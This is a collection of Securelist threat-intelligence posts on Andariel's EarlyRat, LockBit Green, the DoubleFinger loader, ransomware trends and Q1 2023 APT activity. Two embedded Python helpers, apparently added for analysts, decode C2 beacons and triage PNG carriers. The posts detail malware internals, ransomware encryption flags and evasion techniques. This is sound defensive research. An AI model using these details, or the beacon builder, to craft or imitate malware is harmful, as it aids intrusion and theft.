GReAT – Securelist (https://securelist.com)

Andariel’s silly mistakes and a new malware family
https://securelist.com/lazarus-andariel-mistakes-and-easyrat/110119/
Wed, 28 Jun 2023 10:00:24 +0000

Introduction

Andariel, a part of the notorious Lazarus group, is known for its use of the DTrack malware and Maui ransomware in mid-2022. During the same period, Andariel also actively exploited the Log4j vulnerability as reported by Talos and Ahnlab. Their campaign introduced several new malware families, such as YamaBot and MagicRat, but also updated versions of NukeSped and, of course, DTrack.

While on an unrelated investigation recently, we stumbled upon this campaign and decided to dig a little bit deeper. We discovered a previously undocumented malware family and an addition to Andariel’s set of TTPs.

From initial infection to fat fingers

Andariel infects machines by executing a Log4j exploit, which, in turn, downloads further malware from the C2 server. Unfortunately, we were unable to catch the first piece of malware they downloaded, but we did see that exploitation was closely followed by the DTrack backdoor being downloaded.

From this point on, things got rather interesting, as we were able to reproduce the commands the attackers executed. It quickly became clear that the commands were run by a human operator, and judging by the number of mistakes and typos, likely an inexperienced one. For example:

Note how “Program” is misspelled as “Prorgam”. Another funny moment was when the operators realized they were in a system that used the Portuguese locale. This took surprisingly long: they only learned after executing cmd.exe /c net localgroup, as you can see below:

We were also able to identify the set of off-the-shelf tools that Andariel installed and ran during the command execution phase, and then used for further exploitation of the target. Below are some examples:

  • Supremo remote desktop;
  • 3Proxy;
  • Powerline;
  • Putty;
  • Dumpert;
  • NTDSDumpEx;
  • ForkDump;
  • And more, which can be found in our private report.

Meet EarlyRat

We first noticed a version of EarlyRat in one of the aforementioned Log4j cases and assumed it was downloaded via Log4j. However, when we started hunting for more samples, we found phishing documents that ultimately dropped EarlyRat. The phishing document itself is not that advanced, as can be seen below:

Once macros are enabled, the following command is executed:

Oddly enough, the VBA code pings a server associated with the HolyGhost / Maui ransomware campaign.

EarlyRat, just like many other RATs (remote access Trojans), collects system information upon starting and sends it to the C2 using the following template:

As can be seen above, there are two different parameters in the request: “id” and “query”. Next to those, the “rep0” and “page” parameters are also supported. They are used in the following cases:

  • id: unique ID of the machine, used as a cryptographic key to decrypt the value of “query”
  • query: the actual content. It is Base64 encoded and rolling XORed with the key specified in the “id” field.
  • rep0: the value of the current directory
  • page: the value of the internal state
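The check-in template above can be parsed from a captured request into its four fields. This is an added analyst-side decoder, not code from the report or from the malware; it assumes the report’s “rolling XOR” means a repeating-key XOR over the bytes of “id” (the exact scheme is not stated), and the request path and sample values are constructed.

```python
import base64
from urllib.parse import parse_qs, urlencode, urlsplit


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. Assumed interpretation of the report's 'rolling XOR'
    with the 'id' value as key; adjust if a sample shows a different scheme."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_query(machine_id: str, query_value: str) -> bytes:
    """Reverse the reported encoding of 'query': Base64, then XOR with 'id'."""
    raw = base64.b64decode(query_value)
    return xor_with_key(raw, machine_id.encode())


def parse_beacon(request_line: str) -> dict:
    """Split an HTTP request line such as
    'GET /path?id=...&query=...&rep0=...&page=... HTTP/1.1'
    into the fields the report describes. 'rep0' and 'page' are optional."""
    method, target, _version = request_line.split(" ", 2)
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    fields = {k: v[0] for k, v in qs.items()}
    missing = {"id", "query"} - fields.keys()
    if missing:
        raise ValueError(f"beacon lacks required parameter(s): {sorted(missing)}")
    return {
        "method": method,
        "machine_id": fields["id"],
        # system information / command output carried in 'query'
        "content": decode_query(fields["id"], fields["query"]).decode("utf-8", "replace"),
        "current_dir": fields.get("rep0"),  # reported as the current directory
        "state": fields.get("page"),        # reported as the internal state
    }


def build_constructed_beacon(machine_id: str, content: str, rep0: str, page: str) -> str:
    """Build a request line that follows the described template, for testing the
    decoder offline. Constructed input, not real traffic; the path is a placeholder."""
    enc = base64.b64encode(xor_with_key(content.encode(), machine_id.encode())).decode()
    params = urlencode({"id": machine_id, "query": enc, "rep0": rep0, "page": page})
    return f"GET /PLACEHOLDER_PATH?{params} HTTP/1.1"


if __name__ == "__main__":
    req = build_constructed_beacon("ABCD1234", "hostname=DESKTOP;os=Windows 10", "C:\\Users\\user", "1")
    print(parse_beacon(req))
```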

In terms of functionality, EarlyRat is very simple. It is capable of executing commands, and that is about the most interesting thing it can do. There are a number of high-level similarities between EarlyRat and MagicRat. Both are written using a framework: Qt is used for MagicRat and PureBasic for EarlyRat. Also, the functionality of both RATs is very limited.

Conclusion

Despite being an APT group, Lazarus is known for performing typical cybercrime tasks, such as deploying ransomware, which makes the cybercrime landscape more complicated. Moreover, the group uses a wide variety of custom tools, constantly updating existing and developing new malware.

Focusing on TTPs as we did with Andariel helps to minimize attribution time and detect attacks in their early stages. This information can also help in taking proactive countermeasures to prevent incidents from happening.

Intelligence reports can help you to stay protected against these threats. If you want to keep up to date on the latest TTPs used by criminals, or if you have questions about our private reports, reach out to us at crimewareintel@kaspersky.com.


LockBit Green and phishing that targets organizations
https://securelist.com/crimeware-report-lockbit-switchsymb/110068/
Thu, 22 Jun 2023 10:00:01 +0000

Introduction

In recent months, we published private reports on a broad range of subjects. We wrote about malware targeting Brazil, about CEO fraud attempts, Andariel, LockBit and others. For this post, we selected three private reports, namely those related to LockBit and phishing campaigns targeting businesses, and prepared excerpts from these. If you have questions or need more information about our crimeware reporting service, contact crimewareintel@kaspersky.com.

Phishing and a kit

Recently we stumbled upon a Business Email Compromise (BEC) case, active since at least Q3 2022. The attackers target German-speaking companies in the DACH region. As in many other BEC cases, they register a domain name that is similar to that used by the attacked organization and typically differs in one or two letters. For reasons unknown, the Reply-to field contains a different email address from the From field. The Reply-to email address does not mimic the target organization’s domain.

In contrast to BEC campaigns that are targeted and require significant effort from the criminals, ordinary phishing campaigns are relatively simple. This creates opportunities for automation, of which the SwitchSymb phishing kit is one example.

At the end of this past January, we observed a spike in phishing emails from a campaign targeting business users, which we have closely monitored. We noticed that the message contained a link to an “email confirmation form”. If one clicked on the link, they found themselves on a page looking very similar to that of the recipient’s domain. The phishing kit was designed to serve multiple campaigns at a time while running one instance on the web server. This was easily demonstrated by modifying the page URL, specifically the reference to the targeted user in it: the layout of the phishing page would change.

An example of a SwitchSymb-generated phishing page

LockBit Green

LockBit is one of the most prolific ransomware groups currently active, targeting businesses all over the world. Over time, they have adopted code from other ransomware gangs, such as BlackMatter and DarkSide, making it easier for potential affiliates to operate the ransomware.

Starting in this past February, we have detected a new variant, named “LockBit Green”, which borrows code from the now-defunct Conti gang. According to the Kaspersky Threat Attribution Engine (KTAE), LockBit incorporates 25% of Conti code.

KTAE shows similarities between LockBit Green and Conti

Three pieces of adopted code really stand out: the ransom note, the command line options and the encryption scheme. Adopting the ransom note makes the least sense. We could not think of a good reason for doing so, but nevertheless, LockBit did it. In terms of command line options, the group added those from Conti to make them available in LockBit. All the command line options available in LockBit Green are:

Flag            Functionality
-p folder       Encrypt the selected folder using a single thread
-m local        Encrypt all available drives within multiple threads, each of them
-m net          Encrypt all network shares within multiple threads, each of them
-m all          Encrypt all available drives and network shares within multiple threads, each of them
-m backups      Flag not available to use on the detected versions but coded inside the ransomware
-size chunk     Functionality to encrypt only part of the files
-log file.log   Possibility to log every action performed by the ransomware
-nomutex        Skip mutex creation

Finally, LockBit adopted the encryption scheme from Conti. The group now uses a custom ChaCha8 implementation to encrypt files with a randomly generated key and nonce that are saved/encrypted with a hard-coded public RSA key.

Binary diffing across the two families

Multi-platform LockBit

We recently stumbled on a ZIP file, uploaded to a multiscanner, that contained LockBit samples for multiple architectures, such as Apple M1, ARM v6, ARM v7, FreeBSD and many others. The next question would obviously be, “What about codebase similarity?”.

For this, we used the KTAE: simply throwing in the downloaded ZIP file was enough to see that all the samples were derived from the LockBit Linux/ESXi version, which we wrote about in an earlier private report.

Source code shared with LockBit Linux

Further analysis of the samples led us to believe that LockBit were in the process of testing their ransomware on various architectures, instead of deploying it in the wild. For instance, the macOS sample was unsigned, so it could not be executed as is. Also, the string encryption method was simple: one byte XOR.

Nevertheless, our findings suggest that LockBit will target more platforms in the wild in the (near) future.

Conclusion

The world of cybercrime is huge, consisting of many players and gangs that are fluid in terms of composition. Groups adopt other groups’ code, and affiliates — which can be considered cybercrime groups in their own right — switch between different types of malware. Groups work on upgrades to their malware, adding features and providing support for multiple, previously unsupported, platforms, a trend that has existed for some time now.

When an incident occurs, it is important to find out who has targeted you. This helps to limit the scope of incident response and could help to prevent further damage. The KTAE attributes code to cybercrime groups and highlights features shared by different malware families. This information can also help in taking proactive countermeasures to prevent incidents from happening in the future.

Finally, criminals often resort to old tricks, such as phishing, which, nevertheless, remain highly effective. Being aware of the latest trends can prevent threats like BEC from materializing.

Intelligence reports can help you to stay protected against these threats. If you want to keep up to date on the latest TTPs used by criminals or have questions about our private reports, contact crimewareintel@kaspersky.com.


Sneaky DoubleFinger loads GreetingGhoul targeting your cryptocurrency
https://securelist.com/doublefinger-loader-delivering-greetingghoul-cryptocurrency-stealer/109982/
Mon, 12 Jun 2023 10:00:57 +0000

Introduction

Stealing cryptocurrencies is nothing new. For example, the Mt. Gox exchange was robbed of many bitcoins in the early 2010s. Attackers such as those behind the Coinvault ransomware were after your Bitcoin wallets, too. Since then, stealing cryptocurrencies has continued to occupy cybercriminals.

One of the latest additions to this phenomenon is the multi-stage DoubleFinger loader delivering a cryptocurrency stealer. DoubleFinger is deployed on the target machine when the victim opens a malicious PIF attachment in an email message, ultimately executing the first of DoubleFinger’s loader stages.

DoubleFinger stage 1

The first stage is a modified “espexe.exe” (MS Windows Economical Service Provider Application) binary, where the DialogFunc is patched so that a malicious shellcode is executed. After resolving API functions by hash, which were added to DialogFunc, the shellcode downloads a PNG image from Imgur.com. Next, the shellcode searches for the magic bytes (0xea79a5c6) in the downloaded image, locating the encrypted payload within the image.

Real DialogFunc function (left) and patched function with shellcode (right)

The encrypted payload consists of:

  1. A PNG with the fourth-stage payload;
  2. An encrypted data blob;
  3. A legitimate java.exe binary, used for DLL sideloading;
  4. The DoubleFinger stage 2 loader.

DoubleFinger stage 2

The second-stage shellcode is loaded by executing the legitimate Java binary located in the same directory as the stage 2 loader shellcode (the file is named msvcr100.dll). Like the first stage, this file is a legitimate binary that has been patched, with a structure and functionality similar to the first stage.

To no one’s surprise, the shellcode loads, decrypts and executes the third stage shellcode.

DoubleFinger stage 3

The third-stage shellcode differs greatly from the first and second stages. For example, it uses low-level Windows API calls, and ntdll.dll is loaded and mapped in the process memory to bypass hooks set by security solutions.

The next step is to decrypt and execute the fourth-stage payload, located in the aforementioned PNG file. Unlike the downloaded PNG file, which does not display a valid image, this PNG file does. The steganography method used is, however, rather simple, as the data is retrieved from specific offsets.

The aa.png file with embedded Stage 4

DoubleFinger stage 4

The stage 4 shellcode is rather simple. It locates the fifth stage within itself and then uses the Process Doppelgänging technique to execute it.

DoubleFinger stage 5

The fifth stage creates a scheduled task that executes the GreetingGhoul stealer every day at a specific time. It then downloads another PNG file (which is actually the encrypted GreetingGhoul binary prepended with a valid PNG header), decrypts it and then executes it.
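Stages 1, 4 and 5 all use PNG files as carriers: one that is not a valid image and holds the payload after the 0xea79a5c6 marker, one that is a valid image with data at fixed offsets, and one that is only a PNG header in front of an encrypted binary. The triage helper below is an added example (not code from the report or the malware) that walks the PNG chunk list, reports whether the file is structurally a real image, measures data appended after IEND, and locates the marker; the marker’s byte order is not stated in the report, so both orders are searched, and the sample files are constructed.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Marker the report says stage 1 searches for in the downloaded image.
# Its byte order is not stated, so both orders are searched (assumption).
MAGIC = 0xEA79A5C6
MAGIC_PATTERNS = (MAGIC.to_bytes(4, "big"), MAGIC.to_bytes(4, "little"))


def parse_png_chunks(data: bytes):
    """Walk the PNG chunk list. Returns (chunks, end_offset): chunks is a list of
    (type, offset, length, crc_ok); end_offset is the first byte after IEND, or
    after the last complete chunk if IEND is missing or a chunk is truncated."""
    if not data.startswith(PNG_SIG):
        return [], 0
    pos, chunks = len(PNG_SIG), []
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body_end = pos + 8 + length
        if body_end + 4 > len(data):
            break  # truncated chunk; whatever follows is treated as trailing data
        body = data[pos + 8:body_end]
        stored_crc = struct.unpack(">I", data[body_end:body_end + 4])[0]
        crc_ok = (zlib.crc32(ctype + body) & 0xFFFFFFFF) == stored_crc
        chunks.append((ctype.decode("latin-1"), pos, length, crc_ok))
        pos = body_end + 4
        if ctype == b"IEND":
            break
    return chunks, pos


def find_all(data: bytes, pattern: bytes):
    hits, start = [], 0
    while True:
        i = data.find(pattern, start)
        if i < 0:
            return hits
        hits.append(i)
        start = i + 1


def triage_png(data: bytes) -> dict:
    """Summarise a PNG carrier: structural validity (IHDR first, IEND last, CRCs
    correct), bytes appended after the image, and marker offsets if any."""
    chunks, end = parse_png_chunks(data)
    types = [c[0] for c in chunks]
    valid = bool(chunks) and types[0] == "IHDR" and types[-1] == "IEND" and all(c[3] for c in chunks)
    hits = sorted({h for p in MAGIC_PATTERNS for h in find_all(data, p)})
    return {
        "is_png": data.startswith(PNG_SIG),
        "valid_structure": valid,
        "chunk_types": types,
        "image_end": end,
        "trailing_bytes": max(len(data) - end, 0),
        "marker_offsets": hits,
    }


def extract_after_marker(data: bytes):
    """Bytes following the first marker hit (the region stage 1 would treat as
    its encrypted payload) for further analysis, or None if no marker."""
    hits = triage_png(data)["marker_offsets"]
    return data[hits[0] + 4:] if hits else None


def _chunk(ctype: bytes, body: bytes) -> bytes:
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def make_constructed_samples():
    """Constructed inputs, not real artefacts: a minimal valid 1x1 greyscale PNG;
    the same PNG with the marker and a dummy blob appended after IEND (stage-1
    shape); and a bare PNG signature followed by dummy data (stage-5 shape)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # one scanline: filter byte + one pixel
    clean = PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")
    dummy_blob = bytes(range(16))
    appended = clean + MAGIC.to_bytes(4, "little") + dummy_blob
    header_only = PNG_SIG + dummy_blob * 4
    return clean, appended, header_only, dummy_blob


if __name__ == "__main__":
    for name, sample in zip(("clean", "appended", "header_only"), make_constructed_samples()[:3]):
        print(name, triage_png(sample))
```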

GreetingGhoul & Remcos

GreetingGhoul is a stealer designed to steal cryptocurrency-related credentials. It essentially consists of two major components that work together:

  1. A component that uses MS WebView2 to create overlays on cryptocurrency wallet interfaces;
  2. A component that detects cryptocurrency wallet apps and steals sensitive information (e.g. recovery phrases).

Examples of fake windows

With hardware wallets, a user should never enter their recovery seed on the computer. A hardware wallet vendor will never ask for that.

Next to GreetingGhoul we also found several DoubleFinger samples that downloaded the Remcos RAT. Remcos is a well-known commercial RAT often used by cybercriminals. We’ve seen it being utilized in targeted attacks against businesses and organizations.

Victims & Attribution

We found several pieces of Russian text in the malware. The first part of the C2 URL is “Privetsvoyu” which is a misspelled transliteration of the Russian word for “Greetings.” Secondly, we found the string “salamvsembratyamyazadehayustutlokeretodlyagadovveubilinashusferu.” Despite the weird transliteration, it roughly translates to: “Greetings to all brothers, I’m suffocating here, locker is for bastards, you’ve messed up our area of interest.”

Looking at the victims, we see them in Europe, the USA and Latin America. This is in accordance with the old adage that cybercriminals from CIS countries don’t attack Russian citizens. However, the pieces of Russian text and the victimology are not enough to conclude that those behind this campaign are indeed from the post-Soviet space.

Conclusion

Our analysis of the DoubleFinger loader and GreetingGhoul malware reveals a high level of sophistication and skill in crimeware development, akin to advanced persistent threats (APTs). The multi-staged, shellcode-style loader with steganographic capabilities, the use of Windows COM interfaces for stealthy execution, and the implementation of Process Doppelgänging for injection into remote processes all point to well-crafted and complex crimeware. The use of Microsoft WebView2 runtime to create counterfeit interfaces of cryptocurrency wallets further underscores the advanced techniques employed by the malware.

To protect yourself against these threats, intelligence reports can help. If you want to stay up to date on the latest TTPs used by criminals, or have questions about our private reports, please contact crimewareintel@kaspersky.com.

Indicators of compromise


New ransomware trends in 2023
https://securelist.com/new-ransomware-trends-in-2023/109660/
Thu, 11 May 2023 08:00:13 +0000

Ransomware keeps making headlines. In a quest for profits, attackers target all types of organizations, from healthcare and educational institutions to service providers and industrial enterprises, affecting almost every aspect of our lives. In 2022, Kaspersky solutions detected over 74.2M attempted ransomware attacks, which was 20% more than in 2021 (61.7M). Although early 2023 saw a slight decline in the number of ransomware attacks, they were more sophisticated and better targeted.

On the eve of the global Anti-Ransomware Day, Kaspersky looks back on the events that shaped the ransomware landscape in 2022, reviews the trends that were predicted last year, discusses emerging trends, and makes a forecast for the immediate future.

Looking back on last year’s report

Last year, we discussed three trends in detail:

  • Threat actors trying to develop cross-platform ransomware to be as adaptive as possible
  • The ransomware ecosystem evolving and becoming even more “industrialized”
  • Ransomware gangs taking sides in the geopolitical conflict

These trends have persisted. A few months after last year’s blog post came out, we stumbled across a new multi-platform ransomware family, which targeted both Linux and Windows. We named it RedAlert/N13V. The ransomware, which focused on non-Windows platforms, supported the halting of VMs in an ESXi environment, clearly indicating what the attackers were after.

Another ransomware family, LockBit, has apparently gone even further. Security researchers discovered an archive that contained test builds of the malware for a number of less common platforms, including macOS and FreeBSD, as well as for various non-standard processor architectures, such as MIPS and SPARC.

As for the second trend, we saw that BlackCat adjusted their TTPs midway through the year. They registered domains under names that looked like those of breached organizations, setting up Have I Been Pwned-like websites. Employees of the victim organizations could use these sites to check if their names had popped up in stolen data, thus increasing the pressure on the affected organization to pay the ransom.

Although the third trend we spotted last year was one of ransomware gangs taking sides in the geopolitical conflict, it does not apply to them exclusively. There was one peculiar sample: a stealer called Eternity. We created a private report about this after an article claimed that the malware was used in the geopolitical conflict. Our research showed that there was a whole malware ecosystem around Eternity, including a ransomware variant. After the article appeared, the author made sure that the malware did not affect users in Ukraine and included a pro-Ukrainian message inside the malware.

The developer warns against using their malware in Ukraine

Pro-Ukrainian message inside the malware code

What else shaped the ransomware landscape in 2022

Ransomware groups come and go, and it is little wonder that some of them ceased operations last year as others emerged.

For example, we reported on the emergence of RedAlert/N13V, Luna, Sugar, Monster, and others. However, the most active family that saw light in 2022 was BlackBasta. When we published our initial report on BlackBasta in April 2022, we were only aware of one victim, but the number has since sharply increased. Meanwhile, the malware itself evolved, adding an LDAP-based self-spreading mechanism. Later, we encountered a version of BlackBasta that targeted ESXi environments, and the most recent version that we found supported the x64 architecture.

As mentioned above, while all those new groups entered the game, some others, such as REvil and Conti, went dark. Conti was the most notorious of these and enjoyed the most attention since their archives were leaked online and analyzed by many security researchers.

Finally, other groups like Clop ramped up their activities over the course of last year, reaching their peak in early 2023 as they claimed to have hacked 130 organizations using a single zero-day vulnerability.

Interestingly, the top five most impactful and prolific ransomware groups (according to the number of victims listed on their data leak sites) have drastically changed over the last year. The now-defunct REvil and Conti, which were second and third, respectively, in terms of attacks in H1 2022, gave way to Vice Society and BlackCat in Q1 2023. The remaining ransomware groups that formed the top five in Q1 2023 were Clop and Royal.

Top five ransomware groups by the number of published victims

H1 2022              H2 2022              Q1 2023
LockBit        384   LockBit        368   LockBit        272
REvil          253   BlackBasta     176   Vice Society   164
Conti          173   BlackCat       113   BlackCat        85
BlackCat       100   Royal           74   Clop            84
Vice Society    54   BianLian        72   Royal           65
Other          384   Other          539   Other          212

Ransomware from an incident response perspective

Global Emergency Response Team (GERT) worked on many ransomware incidents last year. In fact, this was the number-one challenge they faced, although the share of ransomware in 2022 decreased slightly from 2021, going from 51.9% to 39.8%.

In terms of initial access, nearly half of the cases GERT investigated (42.9%) involved exploitation of vulnerabilities in public-facing devices and apps, such as unpatched routers, vulnerable versions of the Log4j logging utility, and so on. The second-largest category of cases consisted of compromised accounts and malicious emails.

The most popular tools employed by ransomware groups remain unchanged from year to year. Attackers have used PowerShell to collect data, Mimikatz to escalate privileges, PsExec to execute commands remotely, or frameworks like Cobalt Strike for all attack stages.

As we looked back on the events of 2022 and early 2023, and analyzed the various ransomware families, we tried to figure out what the next big thing in this field might be. These observations produced three potential trends that we believe will shape the threat landscape for the rest of 2023.

Trend 1: More embedded functionality

We saw several ransomware groups extend the functionality of their malware during 2022. Self-spreading, real or fake, was the most noteworthy new addition. As mentioned above, BlackBasta started spreading itself by using the LDAP library to get a list of available machines on the network.

LockBit added a so-called “self-spreading” feature in 2022, saving its operators the effort needed to run tools like PsExec manually. At least, that is what “self-spreading” would normally suggest. In practice, this turned out to be nothing more than a credential-dumping feature, removed in later versions.

The Play ransomware, for one, does have a self-spreading mechanism. It collects different IPs that have SMB enabled, establishes a connection to these, mounts the SMB resources, then copies itself and runs on the target machines.

Self-propagation has been adopted by many notorious ransomware groups lately, which suggests that the trend will continue.

Trend 2: Driver abuse

Abusing a vulnerable driver for malicious purposes may be an old trick in the book, but it still works well, especially on antivirus (AV) drivers. The Avast Anti Rootkit kernel driver contained certain vulnerabilities that were previously exploited by AvosLocker. In May 2022, SentinelLabs described in detail two new vulnerabilities (CVE-2022-26522 and CVE-2022-26523) in the driver. These were later exploited by the AvosLocker and Cuba ransomware families.

AV drivers are not the only ones to be abused by malicious actors. Our colleagues at TrendMicro reported on a ransomware actor abusing the Genshin Impact anti-cheat driver by using it to kill endpoint protection on the target machine.

The trend of driver abuse continues to evolve. The latest case reported by Kaspersky is rather odd, as it does not fit either of the previous two categories. Legitimate code-signing certificates, such as Nvidia’s leaked certificate and Kuwait Telecommunication Company’s certificate, were used to sign a malicious driver, which was then used in wiper attacks against Albanian organizations. The wiper used the rawdisk driver to get direct access to the hard drive.

We continue to follow ransomware gangs to see what new ways of abusing drivers they come up with, and we will be sharing our findings both publicly and on our TIP page.

Trend 3: Code adoption from other families to attract even more affiliates

Major ransomware gangs are borrowing capabilities from either leaked code or code purchased from other cybercriminals, which may improve the functionality of their own malware.

We recently saw the LockBit group adopt at least 25% of the leaked Conti code and issue a new version based entirely on that. Initiatives like these enable affiliates to work with familiar code, while the malware operators get an opportunity to boost their offensive capabilities.

Collaboration among ransomware gangs has also resulted in more advanced attacks. Groups are working together to develop cutting-edge strategies for circumventing security measures and improving their attacks.

The trend has given rise to ransomware businesses that build high-quality hack tools and sell them to other ransomware businesses on the black market.

Conclusion

Ransomware has been around for many years, evolving into a cybercriminal industry of sorts. Threat actors have experimented with new attack tactics and procedures, and their most effective approaches live on, while failed experiments have been forgotten. Ransomware can now be considered a mature industry, and we expect no groundbreaking discoveries or game-changers any time soon.

Ransomware groups will continue maximizing the attack surface by supporting more platforms. While attacks on ESXi and Linux servers are now commonplace, top ransomware groups are striving to target more platforms that might contain mission-critical data. A good illustration of this trend is the recent discovery of an archive with test builds of LockBit ransomware for macOS, FreeBSD, and unconventional CPU architectures, such as MIPS, SPARC, and so on.

In addition to that, TTPs that attackers use in their operations will continue to evolve — the driver abuse technique, which we discussed above, is a good example of this. To effectively counter ransomware actors’ ever-changing tactics, we recommend that organizations and security specialists:

  • Update their software in a timely manner to prevent infection through vulnerability exploitation, one of the initial infection vectors most frequently used by ransomware actors.
  • Use security solutions that are tailored to protecting their infrastructure from various threats, including anti-ransomware tools, targeted attack protection, EDR, and so on.
  • Keep their SOC or information security teams’ knowledge about ransomware tactics and techniques up to date by using the Threat Intelligence service, a comprehensive source of crucial information about new tricks that cybercriminals come up with.

APT trends report Q1 2023
https://securelist.com/apt-trends-report-q1-2023/109581/
Thu, 27 Apr 2023 10:00:47 +0000

For more than five years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. These summaries are based on our threat intelligence research, and they provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.

This is our latest installment, focusing on activities that we observed during Q1 2023.

Readers who would like to learn more about our intelligence reports or request more information on a specific report, are encouraged to contact intelreports@kaspersky.com.

The most remarkable findings

While investigating possible Turla activities, we discovered that the TunnusSched backdoor (aka QUIETCANARY) was being delivered from a Tomiris implant. Having tracked Tomiris since 2021, we believe, with medium-to-high confidence, that it is distinct from Turla. So, we think that either Tomiris is conducting false-flag attacks implicating Turla, or (more likely) that Turla and Tomiris co-operate.

Russian-speaking activity

During our investigation into Tomiris’s activities in 2022, we identified the use of a previously undocumented implant developed in Rust, dubbed “JLORAT”, which was in operation as early as August 2022 and remained active into 2023.

Chinese-speaking activity

We discovered a new in-memory implant, called TargetPlug, that has been used to target game developers in South Korea since at least October 2022. Further analysis revealed that the malware is signed with valid certificates and appears to have a connection to the threat actor Winnti, a connection established through several overlaps such as shared infrastructure, code signing and victimology. We reported the misuse of the stolen “Zepetto Co.” certificate via the appropriate channel.

Middle East

We have identified ongoing spear-phishing campaigns targeting Middle Eastern countries dating back to July 2021. We assess that MuddyWater, a threat actor believed to originate from the same region, is operating these campaigns. Based on our analysis, MuddyWater was able to infect several victims in the Middle East and North Africa. The group went after high-profile entities operating in the government, aviation, energy, telecoms and banking sectors. Our investigation led us to identify the targets of interest to the attackers in this campaign. In fact, a number of spear-phishing emails seem to have been crafted and sent to employees of companies in Saudi Arabia, Turkey, the UAE, Egypt, Jordan, Bahrain, Canada, Kuwait, Israel, Syria, Azerbaijan, Armenia and Malaysia.

In late December last year, we spotted malware that relies on Microsoft Exchange for command-and-control (C2) communication and data exfiltration. Further analysis of the samples revealed it to be a variant of OilRig’s Lookout malware, which we had reported earlier in 2020 and which targeted a ministry of foreign affairs entity in the Middle East and its branches worldwide. The new variant is also .NET-based, with several modifications in its execution flow compared to the original version, but it still uses Exchange Web Services (EWS) via the victim’s mailbox for its operations. Interestingly, one of the tools used during the intrusion is capable of informing the threat actor of password changes for the target organization’s users. This technique allows for stealthy, persistent access using valid credentials. The threat actor used embedded Proton Mail and Gmail addresses for data exfiltration. By analyzing the Proton Mail GPG signatures, we were able to determine that these email addresses were created on November 30, 2022, indicating that this is a recent campaign. While the initial method of entry remains uncertain, our analysis of the malware and tools used suggests that the threat actor likely continues to operate using credentials obtained from previous intrusions, which we found in one of the tools used in this campaign.

We spotted another intrusion-set and malware samples affecting an IT company in the Middle East since early August 2022. We found evidence to suggest, with medium confidence, that the IT company intrusion is linked to OilRig and its recent attack. The threat actor employed a typical Word document containing malicious macros, utilizing a job recruitment theme, to deliver PowerShell-based malware implants that collect sensitive information, including user and server credentials. Putting this into context, the threat actor could abuse the collected credentials to exploit the supply-chain relationship and compromise the IT company’s clients.

In January, we identified new malware written in the .NET language for remote console command execution that was used in a campaign dating back to December 2022. Further investigation led us to uncover what appears to be a new malicious actor, which we dubbed Trila, targeting Lebanese government entities. This actor’s toolset primarily consists of simple, homebrewed malware that enables them to remotely execute Windows system commands on infected machines. The information gathered is then exfiltrated to a legitimate interact.sh project instance that serves as a C2. In addition to the .NET malware, we also discovered Go and Rust variants of a simple, custom SOCKS proxy tool used to redirect C2 communications within the victims’ environment.

LoneZerda is an APT threat actor that is believed to have originated from Libya, with evidence of activity dating back to 2017. The actor was first publicly disclosed by Check Point in July 2019 and is known to use politically themed Facebook pages to trick victims into downloading and executing malware. Our findings indicate that the group was targeting diplomatic entities in countries beyond the initially reported scope (i.e., Libya), but still primarily within the Middle East. We identified indicators that the keylogging module used by the actor was still active on the computers of high-profile victims at the time we wrote our private report, although the attacker’s infrastructure had been sinkholed in March 2020. Our report sheds light on various intrusion aspects not covered by publicly available research to help organizations in the same industry verticals or in the same region to protect against, detect and hunt for this activity.

Southeast Asia and Korean Peninsula

We published our analysis of observed activity over the past year and a half related to the Origami Elephant threat actor. The group has been found to use two distinct attack chains: one for deploying the known Agent K11 framework and the other for deploying the RTY framework (a successor of YTY AES). Most of the initial stages rely on macro scripts, which retain the traditional script structure but also introduce new tricks. Additionally, two new simple downloaders, MinHus and Stage, were identified. These payloads are new versions of the Simple Uploader. The group has also been observed starting to use more complex algorithms to obfuscate strings, instead of simple XOR or addition and subtraction, in an effort to evade detection and attribution.

We recently investigated ScarCruft’s new malware strains and C2 server data. ScarCruft focuses on spying on individuals related to the North Korean government (including what appear to be North Korean workers abroad) and uses tools such as Chinotto for its operations. Our research uncovered a new malware strain developed in the Go language that, for the first time, uses a legitimate cloud messaging service (ably.com) as a C2 mechanism. Our monitoring of this ably.com channel shed unprecedented light on ScarCruft activities. The attackers tried to spread additional scripts for persistence and new payloads using their malware. Compromised web servers were used to host these payloads, and we detected suspicious command files on the C2 servers. We captured these commands and identified a new final payload, SidLevel, with extensive capabilities to steal sensitive information from victims. We also got access to data stolen from ScarCruft’s victims. The group continues to target individuals related to North Korea, including novelists, academic students, and also business people who appear to send funds back to North Korea.

We observed a Lazarus campaign, active until January 2023, leveraging a backdoored UltraVNC client to deliver an updated BLINDINCAN payload. Backdooring prominent open-source programs is one of the means the Lazarus group has been using to deliver its malware. When executed, the compromised application functions normally but covertly collects victim information and transmits it to the C2 servers. Our telemetry shows evidence of a memory-resident payload being retrieved by the backdoored client. The delivered payload was identified as BLINDINCAN, which we have seen being delivered as second-stage malware before. This updated version of BLINDINCAN shares characteristics with previous iterations, such as C2 communication, encryption methods and infection procedure, but it introduces new features, including plug-in-based expansion of its capabilities. Analyzing and cracking the Trojanized application’s communications, we discovered information about possible victims in the manufacturing and real-estate sectors in India. Additional analysis of the C2 servers, compromised since early 2020, suggests additional targeting of telecoms companies in Pakistan and Bulgaria. We believe that this campaign is not limited to these countries and sectors.

